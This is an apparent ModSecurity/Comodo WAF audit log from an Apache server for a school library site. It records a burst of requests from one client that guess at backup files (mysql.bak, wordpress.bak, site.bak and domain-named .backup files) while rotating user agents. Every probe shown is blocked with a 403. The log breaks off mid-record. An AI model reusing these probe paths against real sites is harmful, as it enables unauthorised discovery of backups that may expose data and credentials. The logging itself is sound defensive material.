Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a02bc78-Z-- --969e7579-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8jAAAAAA 103.236.140.4 56796 103.236.140.4 8181 --969e7579-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224344 --969e7579-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --969e7579-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882139036 1835 (- - -) Stopwatch2: 1747543882139036 1835; combined=712, p1=328, p2=357, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --969e7579-Z-- --e9a09f7e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8jQAAAAQ 103.236.140.4 56796 103.236.140.4 8181 --e9a09f7e-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:52.6.0) Gecko/20100101 Firefox/52.6.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609561 --e9a09f7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e9a09f7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882144300 1580 (- - -) Stopwatch2: 1747543882144300 1580; combined=648, p1=321, p2=300, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9a09f7e-Z-- --b1ffcd38-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EzQAAAFA 103.236.140.4 56832 103.236.140.4 8181 --b1ffcd38-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609566 --b1ffcd38-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1ffcd38-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882146903 1817 (- - -) Stopwatch2: 1747543882146903 1817; combined=806, p1=331, p2=445, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ffcd38-Z-- --19a8c83e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kAAAAA4 103.236.140.4 56796 103.236.140.4 8181 --19a8c83e-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090845 --19a8c83e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19a8c83e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882152007 1723 (- - -) Stopwatch2: 1747543882152007 1723; combined=700, p1=331, p2=341, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a8c83e-Z-- --95e6f767-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EzgAAAEk 103.236.140.4 56832 103.236.140.4 8181 --95e6f767-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:52.5.2) Gecko/20100101 Firefox/52.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093275 --95e6f767-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --95e6f767-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882153330 1694 (- - -) Stopwatch2: 1747543882153330 1694; combined=686, p1=330, p2=326, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95e6f767-Z-- --f427da64-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kQAAAAk 103.236.140.4 56796 103.236.140.4 8181 --f427da64-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.2.1) Gecko/20100101 Firefox/60.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303434 --f427da64-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f427da64-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882154753 1815 (- - -) Stopwatch2: 1747543882154753 1815; combined=667, p1=346, p2=294, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f427da64-Z-- --ce168007-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSxwAAAJM 103.236.140.4 56816 103.236.140.4 8181 --ce168007-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224370 --ce168007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce168007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882157665 1781 (- - -) Stopwatch2: 1747543882157665 1781; combined=739, p1=405, p2=305, p3=0, p4=0, p5=28, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce168007-Z-- --da9e1f16-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kwAAAAw 103.236.140.4 56796 103.236.140.4 8181 --da9e1f16-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303448 --da9e1f16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --da9e1f16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882161491 1575 (- - -) Stopwatch2: 1747543882161491 1575; combined=627, p1=312, p2=286, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da9e1f16-Z-- --79ab5c6a-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lAAAAAc 103.236.140.4 56796 103.236.140.4 8181 --79ab5c6a-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609578 --79ab5c6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --79ab5c6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882163316 1625 (- - -) Stopwatch2: 1747543882163316 1625; combined=644, p1=305, p2=301, p3=0, p4=0, p5=37, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ab5c6a-Z-- --ad57371d-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lQAAAAE 103.236.140.4 56796 103.236.140.4 8181 --ad57371d-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:63.0.1) Gecko/20100101 Firefox/63.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609597 --ad57371d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad57371d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882174160 1881 (- - -) Stopwatch2: 1747543882174160 1881; combined=767, p1=419, p2=320, p3=0, p4=0, p5=27, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad57371d-Z-- --25ff4d5e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lwAAABc 103.236.140.4 56796 103.236.140.4 8181 --25ff4d5e-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609609 --25ff4d5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25ff4d5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882180450 1793 (- - -) Stopwatch2: 1747543882180450 1793; combined=662, p1=337, p2=298, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25ff4d5e-Z-- --fd3c786c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8mQAAAAU 103.236.140.4 56796 103.236.140.4 8181 --fd3c786c-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436669 --fd3c786c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd3c786c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882204736 1798 (- - -) Stopwatch2: 1747543882204736 1798; combined=690, p1=366, p2=298, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd3c786c-Z-- --5209351f-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSygAAAII 103.236.140.4 56816 103.236.140.4 8181 --5209351f-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090861 --5209351f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5209351f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882205356 2119 (- - -) Stopwatch2: 1747543882205356 2119; combined=764, p1=354, p2=383, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5209351f-Z-- --8a7e1550-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSywAAAJc 103.236.140.4 56816 103.236.140.4 8181 --8a7e1550-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609644 --8a7e1550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a7e1550-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882210305 1658 (- - -) Stopwatch2: 1747543882210305 1658; combined=666, p1=330, p2=295, p3=0, p4=0, p5=40, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a7e1550-Z-- --07c94d5f-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSzAAAAIA 103.236.140.4 56816 103.236.140.4 8181 --07c94d5f-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190484 --07c94d5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --07c94d5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882214035 1618 (- - -) Stopwatch2: 1747543882214035 1618; combined=658, p1=339, p2=292, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c94d5f-Z-- --30bf7c3e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8mwAAABM 103.236.140.4 56796 103.236.140.4 8181 --30bf7c3e-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436683 --30bf7c3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --30bf7c3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882217177 1622 (- - -) Stopwatch2: 1747543882217177 1622; combined=664, p1=325, p2=311, p3=0, p4=0, p5=27, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30bf7c3e-Z-- --7ecd6f15-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8nAAAAA8 103.236.140.4 56796 103.236.140.4 8181 --7ecd6f15-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.3) Gecko/20100101 Firefox/52.7.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224450 --7ecd6f15-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7ecd6f15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 